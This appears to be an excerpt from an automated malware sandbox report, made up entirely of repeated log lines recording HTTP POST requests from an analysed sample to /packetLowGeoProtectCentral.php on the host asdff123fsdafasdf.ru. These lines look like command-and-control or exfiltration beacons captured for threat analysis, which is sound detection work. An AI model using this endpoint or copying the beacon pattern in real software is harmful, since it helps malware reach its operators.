                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1364Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1392Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 1380Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2512Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /packetLowGeoProtectCentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34Host: asdff123fsdafasdf.ruContent-Length: 2516Expect: 100-continueConnection: Keep-Alive
